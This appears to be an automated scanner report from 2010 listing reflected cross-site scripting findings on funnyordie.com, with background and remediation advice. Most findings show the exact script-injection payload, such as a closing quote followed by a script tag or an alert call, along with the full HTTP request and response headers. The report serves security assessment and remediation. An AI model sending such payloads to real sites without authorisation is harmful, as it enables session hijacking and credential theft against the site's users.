Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad2ac"-alert(1)-"99ab9bfdf80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/blogs?ad2ac"-alert(1)-"99ab9bfdf80=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "04bfd8e981194b0795534bf0a2e57857" X-Runtime: 712 X-Varnish: 1401120260 X-Varnish: 1264352257 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:05:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123267
1.2. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b95"><script>alert(1)</script>0d4686e2561 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/blogs?46b95"><script>alert(1)</script>0d4686e2561=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "5e29e31bdb0d11117ba24e1bfd57aee4" X-Runtime: 267 X-Varnish: 1401119597 X-Varnish: 573897546 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:04:57 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123966
1.3. http://www.funnyordie.com/browse/blogs [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/blogs
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa9a8'-alert(1)-'a7f0c877632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/blogs?fa9a8'-alert(1)-'a7f0c877632=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "45609011d600218ec37219b601e7bf61" X-Runtime: 687 X-Varnish: 1401121108 X-Varnish: 1264353438 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:06:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:06:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123281
1.4. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f4d4'-alert(1)-'a9d31933d36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images?3f4d4'-alert(1)-'a9d31933d36=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "e6864e54292158dee26cb49532544be9" X-Runtime: 341 X-Varnish: 1401116160 X-Varnish: 1264347507 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:01:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:01:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121932
1.5. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cb82"><script>alert(1)</script>f1825de2556 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images?3cb82"><script>alert(1)</script>f1825de2556=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "868b548cb92a9867e0b0b74216295c63" X-Runtime: 531 X-Varnish: 1401114714 X-Varnish: 1264345745 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:00:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:00:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 122624
1.6. http://www.funnyordie.com/browse/images [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7310f"-alert(1)-"b0f9bb66cab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images?7310f"-alert(1)-"b0f9bb66cab=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "a1f74186001c46ed735487e56cc4f58b" X-Runtime: 261 X-Varnish: 1401114965 X-Varnish: 1264346074 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:00:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:00:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121881
1.7. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1e23"-alert(1)-"838fc2f6f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_recent?f1e23"-alert(1)-"838fc2f6f86=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "7bba1aa173f991713adf91a31fa8e68a" X-Runtime: 561 X-Varnish: 1401118589 X-Varnish: 573896216 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:03:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:03:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121754
1.8. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff299'-alert(1)-'ff3162767b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_recent?ff299'-alert(1)-'ff3162767b4=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "2c8633ec87ebe960dd4cc845e2cbf6c5" X-Runtime: 598 X-Varnish: 1401119321 X-Varnish: 573897218 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:04:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121744
1.9. http://www.funnyordie.com/browse/images/all/all/most_recent [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d770a"><script>alert(1)</script>3d31a68f80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_recent?d770a"><script>alert(1)</script>3d31a68f80=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "feec6295d6ee085c9665dcc08c1e76d4" X-Runtime: 558 X-Varnish: 1401117408 X-Varnish: 1264348922 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:02:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:02:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 122424
1.10. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ea97'-alert(1)-'45011e44222 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed?9ea97'-alert(1)-'45011e44222=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "188d9fe3f1ddb438fdbd7a8bf7d96b5d" X-Runtime: 619 X-Varnish: 1401116827 X-Varnish: 1264348200 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:02:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:02:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 122214
1.11. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aa4a"><script>alert(1)</script>789c9c757f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_viewed?7aa4a"><script>alert(1)</script>789c9c757f3=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "df5578b34ce135689d9baf1a15314d61" X-Runtime: 710 X-Varnish: 1401116047 X-Varnish: 573892804 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:01:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:01:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123066
1.12. http://www.funnyordie.com/browse/images/all/all/most_viewed [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d6"-alert(1)-"8b9e8de4647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed?610d6"-alert(1)-"8b9e8de4647=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "877bec39a4609ae2d4a7d50ad3dd0c20" X-Runtime: 684 X-Varnish: 1401116493 X-Varnish: 1264347857 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:01:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:01:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 122274
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccea8"><a>036c17bad81 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /browse/images/all/all/most_viewed/this_monthccea8"><a>036c17bad81 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "a21ead4c84275299756a1b65013ac4c4" X-Runtime: 2063 X-Varnish: 1401168768 X-Varnish: 573955438 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:56:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:56:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121497
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9ef81<img%20src%3da%20onerror%3dalert(1)>75c9debcdc8 was submitted in the REST URL parameter 6. This input was echoed as 9ef81<img src=a onerror=alert(1)>75c9debcdc8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/images/all/all/most_viewed/this_month9ef81<img%20src%3da%20onerror%3dalert(1)>75c9debcdc8 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "4b0cc22cb5b3786188cdd605d3fab396" X-Runtime: 1788 X-Varnish: 1401171466 X-Varnish: 1264412516 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:58:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:58:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 122628
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b1d5'-alert(1)-'5573df1f8f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month2b1d5'-alert(1)-'5573df1f8f6 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "971393735a98e033a0295cd1f0a98592" X-Runtime: 1877 X-Varnish: 1401170666 X-Varnish: 1264411705 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:58:15 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:58:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121490
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... ML = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/images/all/all/most_viewed/this_month2b1d5'-alert(1)-'5573df1f8f6"'); }); } });
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7096"-alert(1)-"8668f9962bf was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_monthf7096"-alert(1)-"8668f9962bf HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "84f97a092847f7c860f75617b56aeba5" X-Runtime: 1726 X-Varnish: 1401170270 X-Varnish: 1264411338 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:57:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:57:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 121664
1.17. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84400'-alert(1)-'67b9bc7bb03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month?84400'-alert(1)-'67b9bc7bb03=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "e0a78be7b2b5d1e788325cd224a8cde6" X-Runtime: 472 X-Varnish: 1401120053 X-Varnish: 1264351949 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:05:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:05:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123028
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... L = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/images/all/all/most_viewed/this_month?84400'-alert(1)-'67b9bc7bb03=1"'); }); } });
1.18. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa74"><script>alert(1)</script>8dc27669d83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/images/all/all/most_viewed/this_month?faa74"><script>alert(1)</script>8dc27669d83=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "499fd8afc45e8651b1b7d0742e11d15c" X-Runtime: 562 X-Varnish: 1401118694 X-Varnish: 573896373 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2 Expires: Fri, 05 Nov 2010 05:04:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123751
1.19. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82566"-alert(1)-"93dcba1f21a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month?82566"-alert(1)-"93dcba1f21a=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "e2b277ae5670aeb2d13a153a2834c2f4" X-Runtime: 263 X-Varnish: 1401119403 X-Varnish: 573897291 Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3 Expires: Fri, 05 Nov 2010 05:04:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:04:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 123005
1.20. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3697c'-alert(1)-'c25227192cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/stories?3697c'-alert(1)-'c25227192cc=1 HTTP/1.1 Host: www.funnyordie.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=utf-8 Status: 200 OK ETag: "c6a4e1b9835d35d305c65f69b772fc4f" X-Runtime: 594 X-Varnish: 1401120827 X-Varnish: 1264353047 Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1 Expires: Fri, 05 Nov 2010 05:06:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 05 Nov 2010 05:06:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 127739
